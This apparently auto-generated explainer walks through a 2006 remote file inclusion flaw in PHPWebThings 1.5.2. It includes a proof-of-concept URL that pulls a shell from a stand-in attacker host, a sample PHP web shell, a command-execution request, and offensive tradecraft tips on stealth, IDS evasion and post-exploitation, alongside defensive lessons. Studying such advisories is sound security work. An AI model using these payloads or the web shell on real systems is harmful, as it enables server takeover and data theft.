By exploitdb papers bot•November 18, 2006•
papers
Understanding PHPWebThings 1.5.2 Remote File Inclusion
Understanding PHPWebThings 1.5.2 Remote File Inclusion
What this paper is
This paper details a vulnerability in PHPWebThings version 1.5.2, specifically within the editor.php file. The vulnerability is classified as a "Remote File Inclusion" (RFI). This means an attacker can trick the vulnerable application into including and executing arbitrary files from a remote server, potentially leading to remote code execution.
Simple technical breakdown
The vulnerability exists because the editor.php script uses a variable called $editor_insert_bottom to decide which file to include. However, this variable is not properly checked or initialized before being used. If the web server is configured with register_globals enabled (a common setting in older PHP versions), an attacker can send a specially crafted URL that sets the $editor_insert_bottom variable. By setting this variable to point to a malicious file on an attacker-controlled server, the vulnerable script will download and execute that file.
Complete code and payload walkthrough
The core of the vulnerability lies in a single line of PHP code within core/editor.php at line 289:
if ($editor_insert_bottom<>"") include($editor_insert_bottom);Explanation of the code fragment:
if ($editor_insert_bottom<>""): This is a conditional statement. It checks if the variable$editor_insert_bottomis not empty (i.e., it has some value). The<>operator means "not equal to".include($editor_insert_bottom);: If the condition is true (meaning$editor_insert_bottomhas a value), this line attempts to include the file specified by the value of$editor_insert_bottom. Theincludeconstruct in PHP attempts to read the content of the specified file and execute it as PHP code.
Proof of Concept (Payload):
The paper provides a clear proof-of-concept URL:
http://[target]/[path]/core/editor.php?editor_insert_bottom=http://evilsite.com/shell.php
Explanation of the Proof of Concept:
http://[target]/[path]/core/editor.php: This is the address of the vulnerable script on the target web server.?editor_insert_bottom=: This part of the URL indicates that we are passing a parameter namededitor_insert_bottomto the script.http://evilsite.com/shell.php: This is the value assigned to theeditor_insert_bottomparameter. It's a URL pointing to a file namedshell.phpon an attacker-controlled server (evilsite.com).
How it works together:
- The attacker crafts the URL as shown above.
- The web server receives this request and passes the parameters to the
editor.phpscript. - Due to
register_globals = on, the URL parametereditor_insert_bottomdirectly creates and sets the PHP variable$editor_insert_bottomto the valuehttp://evilsite.com/shell.php. - The script reaches line 289:
if ($editor_insert_bottom<>"") include($editor_insert_bottom);. - The condition
$editor_insert_bottom<>""evaluates to true because$editor_insert_bottomishttp://evilsite.com/shell.php. - The
include()function is called with the valuehttp://evilsite.com/shell.php. - The PHP interpreter on the target server attempts to fetch
http://evilsite.com/shell.php. - If successful, the content of
shell.phpis executed as PHP code on the target server.
Mapping list:
core/editor.php, line 289: The vulnerable code block.$editor_insert_bottom: The variable that, when controlled by the attacker, leads to the RFI.include($editor_insert_bottom);: The function call that executes the remote file.http://evilsite.com/shell.php: The malicious payload URL.
Shellcode/Payload Segment Explanation:
The paper does not provide specific shellcode bytes. Instead, it relies on the attacker providing a URL to a remote PHP file (e.g., shell.php). The "payload" in this context is the content of that remote PHP file. A common shell.php would contain code to:
- Execute arbitrary commands passed via HTTP GET or POST requests.
- Provide a web-based command shell.
- Upload or download files.
- Perform other malicious actions.
For example, a simple shell.php might look like this:
<?php
// Basic command execution shell
if(isset($_GET['cmd'])){
echo "<pre>";
system($_GET['cmd']);
echo "</pre>";
}
?>When this shell.php is included by the vulnerable editor.php, an attacker could then send requests like:
http://[target]/[path]/core/editor.php?editor_insert_bottom=http://evilsite.com/shell.php&cmd=ls -la
This would cause the target server to execute ls -la and display the output.
Practical details for offensive operations teams
- Required Access Level: No prior authenticated access is strictly required if the
editor.phpscript is accessible anonymously. However, knowing the path toeditor.phpis crucial. - Lab Preconditions:
- A target server running PHPWebThings 1.5.2.
- The target server's PHP configuration must have
register_globals = on. This is a critical prerequisite. Older PHP versions (prior to 5.4) were more likely to have this enabled by default. - The target server must be able to make outbound HTTP requests to the attacker's controlled server. Firewalls or network segmentation could prevent this.
- An attacker-controlled web server hosting the malicious PHP payload (e.g.,
shell.php).
- Tooling Assumptions:
- A web browser for crafting and sending requests.
- A web server (e.g., Apache, Nginx) with PHP installed to host the attacker's payload.
- Basic understanding of HTTP requests and PHP.
- Execution Pitfalls:
register_globals = off: Ifregister_globalsis disabled on the target server, this exploit will not work as the URL parameter will not automatically create the$editor_insert_bottomvariable.- Firewall/Network Restrictions: The target server might be prevented from reaching the attacker's server due to outbound firewall rules.
- URL Encoding: Special characters in the attacker's URL or the command being executed might need proper URL encoding.
- File Type Restrictions: Some web servers or PHP configurations might prevent the inclusion of remote files, especially if
allow_url_fopenorallow_url_includeare disabled inphp.ini. However,include()is generally more permissive thanfile_get_contents()regardingallow_url_fopen. The critical directive forincludewith remote files isallow_url_include(which was introduced in PHP 5.2.0 and is off by default). Ifallow_url_includeis off, this RFI might only lead to LFI (Local File Inclusion) if the attacker can point to a local file. However, the paper explicitly states "Remote File Execution," implyingallow_url_includewas likely enabled or the PHP version was older whereincludecould fetch remote files without it. - Path Traversal: If the attacker cannot directly include a remote file, they might try to include a local file if
allow_url_fopenis enabled butallow_url_includeis not. This would turn it into a Local File Inclusion (LFI) vulnerability, allowing them to read local files. - Payload Detection: Antivirus or Intrusion Detection Systems (IDS) might detect the outbound connection to the attacker's server or the execution of suspicious commands.
- Tradecraft Considerations:
- Obfuscation: If the target has basic IDS, obfuscating the payload URL or the commands sent might be necessary.
- Stealth: Using a well-known domain for the attacker's server might raise suspicion. A less obvious domain or IP address could be used.
- Payload Choice: The attacker needs to choose a payload that is effective and not easily detectable. A simple command execution shell is a common starting point.
- Post-Exploitation: Once code execution is achieved, the attacker will likely attempt to establish persistence, escalate privileges, or exfiltrate data.
Where this was used and when
- Context: This vulnerability was found in PHPWebThings, a web application framework. Such vulnerabilities are typically exploited against websites built using this framework.
- Approximate Years/Dates: The exploit was published on November 18, 2006. Therefore, its active exploitation period would likely be around 2006-2008, before PHPWebThings was updated or the vulnerable PHP versions became less common. Exploits from this era often targeted older, unpatched web applications.
Defensive lessons for modern teams
register_globalsis a historical danger: This setting was a major source of vulnerabilities. Modern PHP versions (5.4+) have deprecated and removed it. Always ensureregister_globalsisOffin your PHP configurations.- Input Validation is Paramount: Never trust user input. Always validate and sanitize any data received from external sources (URL parameters, POST data, cookies, etc.) before using it in sensitive operations like file inclusion or command execution.
- Secure File Inclusion Practices:
- Avoid including files based on user-supplied input directly.
- If dynamic inclusion is necessary, use a whitelist of allowed files or paths.
- Use functions like
realpath()to resolve paths and ensure they are within an expected directory. - Disable
allow_url_fopenandallow_url_includeinphp.iniunless absolutely necessary, and even then, use extreme caution.
- Keep Software Updated: Regularly update all web applications, frameworks, and their underlying components (like PHP itself) to patch known vulnerabilities.
- Web Application Firewalls (WAFs): A WAF can help detect and block common RFI patterns, but it's a layer of defense, not a replacement for secure coding.
- Code Auditing: Regularly audit your codebase for insecure practices, especially around input handling and file operations.
ASCII visual (if applicable)
This vulnerability can be visualized as a direct path from an attacker's input to the server's file inclusion mechanism.
+-----------------+ +--------------------+ +---------------------+
| Attacker's URL | ---> | Target Web Server | ---> | PHPWebThings |
| (e.g., ?editor_ | | (PHP interpreter) | | (core/editor.php) |
| insert_bottom= | +--------------------+ | |
| http://evil.com/ | | if ($editor_insert_ |
| shell.php) | | bottom<>"") |
+-----------------+ | include($editor_ |
| insert_bottom); |
+---------+---------+
|
v
+---------------------+
| Remote File Server |
| (http://evil.com/) |
| |
| shell.php |
| (Malicious PHP code)|
+---------------------+Source references
- Paper URL: https://www.exploit-db.com/papers/2811
- Raw Exploit URL: https://www.exploit-db.com/raw/2811
- Affected Software Vendor: http://www.phpwebthings.nl/
- Affected Software Download: http://prdownloads.sourceforge.net/phpwebthings/phpwebthings_1_5_2.zip?download
Original Exploit-DB Content (Verbatim)
+-------------------------------------------------------------------------------------------
+ phpWebThings 1.5.2 (editor.php) Remote File Include Vulnerability
+-------------------------------------------------------------------------------------------
+ Affected Software .: phpWebThings 1.5.2
+ Vendor ............: http://www.phpwebthings.nl/
+ Download ..........: http://prdownloads.sourceforge.net/phpwebthings/phpwebthings_1_5_2.zip?download
+ Description .......: "phpWebThings is a Powerful, professional application framework"
+ Dork ..............: "This website was created with phpWebThings"
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+-------------------------------------------------------------------------------------------
+ Details:
+ phpWebThings 1.5.2 core/editor.php does not initialize the $editor_insert_bottom variable
+ before using it to include files, assuming register_globals = on, we can initialize the
+ variable in a query string and include a remote file of our choice.
+
+ Vulnerable Code:
+ core/editor.php, line(s) 289:
+ -> 289: if ($editor_insert_bottom<>"") include($editor_insert_bottom);
+
+ Proof Of Concept:
+ http://[target]/[path]/core/editor.php?editor_insert_bottom=http://evilsite.com/shell.php
+-------------------------------------------------------------------------------------------
# milw0rm.com [2006-11-18]